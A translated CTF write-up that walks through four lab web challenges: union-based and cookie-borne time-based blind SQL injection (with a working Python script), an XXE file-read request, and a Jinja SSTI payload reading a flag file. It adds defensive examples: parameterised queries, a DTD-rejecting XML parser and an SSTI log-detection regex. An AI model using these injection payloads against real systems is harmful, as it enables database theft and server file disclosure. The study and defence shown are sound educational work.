hgame-2018 CTF write-up (杭电信安) week 3
2018-03-04 13:43
Free-points SQLi
This challenge has no filtering of any kind, so it really is very easy:
    1 and 1=-1 union select 1,schema_name from information_schema.schemata
Listing the database names gives:
    1 information_schema
    1 test
    1 week3_sqliiii2
    ?id=1 and 1=-1 union select 1,table_name from information_schema.tables
Listing the tables gives:
    ...
    1 test
    1 f111aa4g
    1 users
The flag is presumably in f111aa4g, so list its column names:
    ?id=1 and 1=-1 union select 1,column_name from information_schema.columns
    1 f111aaaggg_w3
    1 username
Presumably the flag is in f111aaaggg_w3.
Final payload:
    http://118.25.18.223:10068/?id=-1 union select 1,f111aaaggg_w3 from f111aa4g
This returns the flag.
Normal SQLi
Description: the challenge author finally changed the port; let's do a normal SQLi.
URL http://123.206.203.108:10010/normalSQLi/index.php
Base score 250
Current score 250
Solvers 39
Hint from a teammate: time-based blind injection via the cookie.
Capturing the request shows the cookie value:
Cookie: name=Z3Vlc3Q%3D; isadmin=0
The source is leaked at http://123.206.203.108:10010/normalSQLi/index.php.bak:
    <?php
    .....
    $username = base64_decode($_COOKIE['name']);
    .....
    $sql = "select * from user where username = '{$username}'";
    $re = mysqli_query($conn, $sql);
    $rs = mysqli_fetch_array($re);
    // echo $rs['flag'];
    echo $username . '<br/>';
    // (the string below reads: "Because the author is too lazy, there is no functionality yet")
    echo "因为出题人太懒了,所以现在没有任何功能";
    .....
The cookie's name field is the injection point; it is base64-encoded.
I used a teammate's script:
    # Converted from the original Python 2 script to Python 3 (print(), urllib.parse, bytes for base64).
    import base64
    import urllib.parse

    import requests

    url = "http://123.206.203.108:10010/normalSQLi/index.php"
    flag = ""
    for i in range(1, 1000):
        for j in range(33, 127):
            # If the i-th character of the flag is chr(j), the query sleeps 3 s and
            # the 2.5 s client timeout fires; a timeout therefore confirms the guess.
            payload = (
                "admin' or if((ascii(substr((select flag from user limit 2,1),%s,1))=%s),sleep(3),false)#"
                % (i, j)
            )
            cookie = {"name": urllib.parse.quote(base64.b64encode(payload.encode()).decode())}
            try:
                r = requests.get(url=url, cookies=cookie, timeout=2.5)
            except requests.exceptions.Timeout:
                flag += chr(j)
                print(flag)
                break
flag: hgame{fLag_1s_h4re…..}
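Both SQLi challenges above share one root cause: the query text is built by pasting user input into SQL, so a `'` in the input ends the string literal and the rest is interpreted as SQL. The following is an added example, not code from this write-up or from the challenge, that re-creates the leaked index.php logic with Python's sqlite3 module (the `user` table, its rows and the injected cookie value are constructed here) and runs the vulnerable string-formatted query next to a parameterised one on the same input. The page's own cookie value `Z3Vlc3Q%3D` is used as the benign case.

```python
"""Added example (not from the write-up): the index.php.bak lookup re-created
with sqlite3 so string interpolation and a parameterised query can be compared
offline on the same base64-encoded cookie."""
import base64
import sqlite3
import urllib.parse

# Constructed sample rows standing in for the challenge's `user` table.
SAMPLE_USERS = [("guest", "no flag"), ("admin", "FLAG{placeholder}")]


def make_db():
    """In-memory database with the constructed `user` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, flag TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def encode_cookie(username):
    """Build the cookie the way the client does: base64, then URL-encoded."""
    return urllib.parse.quote(base64.b64encode(username.encode()).decode())


def username_from_cookie(cookie_value):
    """Mirror base64_decode($_COOKIE['name']): URL-decode, then base64-decode."""
    raw = base64.b64decode(urllib.parse.unquote(cookie_value))
    return raw.decode("utf-8", "replace")


def lookup_vulnerable(conn, cookie_value):
    """Same shape as the leaked PHP: the decoded cookie is pasted into the SQL text."""
    username = username_from_cookie(cookie_value)
    sql = f"select * from user where username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, cookie_value):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    username = username_from_cookie(cookie_value)
    return conn.execute(
        "select * from user where username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    benign = "Z3Vlc3Q%3D"  # the cookie seen in the challenge: base64("guest")
    injected = encode_cookie("' or '1'='1")  # constructed: closes the quote, adds a tautology
    print("vulnerable / benign   :", lookup_vulnerable(db, benign))
    print("vulnerable / injected :", lookup_vulnerable(db, injected))
    print("parameterised/injected:", lookup_parameterised(db, injected))
```

With string formatting the injected cookie returns every row, including the admin row that holds the flag; with a bound parameter the same cookie is just a username nobody has and returns nothing. The time-based variant used in the write-up (`sleep(3)` inside an `if(...)`) is stopped by the same change, because a bound parameter can never introduce a function call.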
Bookstore
XXE (XML external entity injection): ENTITY
When a piece of data is used repeatedly in one or more XML documents, we can predefine an alias for it, an ENTITY, and reference it wherever the data is needed in those documents.
XML defines two kinds of ENTITY: general entities, used inside the XML document, and parameter entities, used inside the DTD.
ENTITY definition syntax:
    <!DOCTYPE doc-name [ <!ENTITY entity-name "entity-content"> ]>
After skimming a few documents and getting a rough understanding, I tried:
    POST /hgame/selectBook?type=dz HTTP/1.1
    Host: 120.79.208.173:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: application/xml
    Referer: http://120.79.208.173:8080/hgame/index.jsp
    Cookie: JSESSIONID=08CEBA8F1F775DC3EA34F98711AB9D89
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0

    <!DOCTYPE netspi [<!ELEMENT methodname ANY><!ENTITY xxe SYSTEM "file:///a/b/flag.txt">]>
    <root>
    <search>type sth!</search>
    <value>&xxe;</value>
    </root>
But it produced no result. Probably I still didn't quite understand this technique.
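Whatever made this attempt fail, the defence on the server side is the same: an XML request body should be parsed with DTDs disabled, because without a DOCTYPE no entity, internal or SYSTEM, can be declared at all. The following is an added example, not code from the write-up or the bookstore application (which is a JSP app; this re-creates the idea in Python), that parses the `<root><search/><value/></root>` body shape above with the standard library's expat parser and aborts as soon as a DOCTYPE, an entity declaration or an external entity reference appears. Both sample documents are constructed, and the SYSTEM path in the malicious one is a placeholder.

```python
"""Added example (not from the write-up): parse the bookstore request body
while refusing any DTD, which is the standard XXE defence."""
from xml.parsers import expat

# Constructed sample inputs mirroring the request body shape in the write-up.
PLAIN_REQUEST = "<root><search>type sth!</search><value>dz</value></root>"
XXE_REQUEST = (
    '<!DOCTYPE netspi [<!ELEMENT methodname ANY>'
    '<!ENTITY xxe SYSTEM "file:///placeholder/secret.txt">]>'  # placeholder path
    "<root><search>type sth!</search><value>&xxe;</value></root>"
)


class DtdRejected(ValueError):
    """Raised as soon as the document declares a DOCTYPE or an entity."""


def parse_request(document):
    """Return {element name: text} for the leaf elements of `document`.

    A DOCTYPE, an entity declaration or an external entity reference aborts
    parsing, so a SYSTEM entity can never reach the file system or the network.
    """
    fields = {}
    path = []

    def reject(*_):
        raise DtdRejected("DTD and entity declarations are not accepted")

    def start(name, _attrs):
        path.append(name)
        fields.setdefault(name, "")

    def end(_name):
        path.pop()

    def text(data):
        if path:
            fields[path[-1]] += data

    parser = expat.ParserCreate()
    parser.buffer_text = True
    parser.StartDoctypeDeclHandler = reject          # refuse the DTD up front
    parser.EntityDeclHandler = reject                # refuse any entity declaration
    parser.ExternalEntityRefHandler = lambda *_: 0   # never resolve external entities
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    parser.Parse(document, True)
    # Container elements such as <root> carry no text of their own; drop them.
    return {name: value for name, value in fields.items() if value}


def accepts(document):
    """True if the document parses under the no-DTD policy, False if it is rejected."""
    try:
        parse_request(document)
        return True
    except (DtdRejected, expat.ExpatError):
        return False


if __name__ == "__main__":
    print(parse_request(PLAIN_REQUEST))
    print("XXE request accepted:", accepts(XXE_REQUEST))
```

Rejecting the DOCTYPE outright is simpler and safer than trying to allow "harmless" internal entities, since the same DTD mechanism also enables entity-expansion denial of service. The `ExternalEntityRefHandler` returning 0 is a second line of defence in case the DOCTYPE handler is ever removed.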
ngc's blog
A teammate hinted at SSTI, so I read up on it. ''.__class__ reaches the type object of the string.
__mro__ (Method Resolution Order) gives the object's inheritance chain directly; Python uses it to determine the order in which methods are resolved.
__subclasses__() gives all the objects accessible in the current environment.
What follows is a bit like SQL injection (enumerating tables):
    ''.__class__
    Oops! That page doesn't exist. http://111.230.105.104:5000/<type 'str'>
    ''.__class__.__mro__
    Oops! That page doesn't exist. http://111.230.105.104:5000/(<type 'str'>, <type 'basestring'>, <type 'object'>)
Find file in the subclass list, then read the flag:
    {{''.__class__.__mro__[2].__subclasses__()[40]('./flag', 'r').read()}}
flag: hgame{skdvhdsbvadvnjVADBVS}
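The probes above leave a distinctive trail: every request path contains template delimiters and Python dunder attributes, and they arrive from one source in a predictable order (__class__, then __mro__, then __subclasses__). The following is an added example, not code from the write-up or the challenge, that scans access-log lines for exactly that pattern so an SSTI attempt against a 404 page shows up in monitoring. The log lines are constructed samples in combined log format; the regular expressions and the `min_hits` threshold are this example's own choices.

```python
"""Added example (not from the write-up): flag SSTI / object-traversal probes
in web-server access logs. All log lines below are constructed samples."""
import re
import urllib.parse

# Constructed log lines; the paths mirror the probes used against the 404 page.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2018:13:40:01 +0800] "GET /posts/1 HTTP/1.1" 200 1843
203.0.113.7 - - [04/Mar/2018:13:41:10 +0800] "GET /%7B%7B''.__class__%7D%7D HTTP/1.1" 404 512
203.0.113.7 - - [04/Mar/2018:13:41:32 +0800] "GET /%7B%7B''.__class__.__mro__%7D%7D HTTP/1.1" 404 540
203.0.113.7 - - [04/Mar/2018:13:43:05 +0800] "GET /%7B%7B''.__class__.__mro__%5B2%5D.__subclasses__()%5B40%5D('./flag','r').read()%7D%7D HTTP/1.1" 404 600
203.0.113.9 - - [04/Mar/2018:13:44:00 +0800] "GET /search?q=mro HTTP/1.1" 200 900
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Matched against the URL-decoded target: template expression delimiters and the
# dunder attributes used to walk from a literal to arbitrary classes.
SSTI_INDICATORS = re.compile(
    r"\{\{|\{%|\$\{|<%"
    r"|__(?:class|mro|subclasses|globals|builtins|import)__"
)


def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urllib.parse.unquote(m.group("target"))  # decode %7B%7B -> {{ etc.
    hits = sorted({x.group(0) for x in SSTI_INDICATORS.finditer(target)})
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "target": target,
        "indicators": hits,
    }


def scan_log(text):
    """All findings in a block of log text, in log order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


def suspicious_sources(text, min_hits=2):
    """Sources with at least `min_hits` flagged requests: an iterative probe
    sequence rather than a single stray brace in a URL."""
    counts = {}
    for finding in scan_log(text):
        counts[finding["ip"]] = counts.get(finding["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["indicators"])
    print("sources to investigate:", suspicious_sources(SAMPLE_LOG))
```

Decoding the target before matching matters: the braces and brackets arrive percent-encoded, so a rule on the raw line would miss them. The fix on the application side is the one this detection cannot replace: never build the template text from the request path; render a fixed template and pass the path in as a variable.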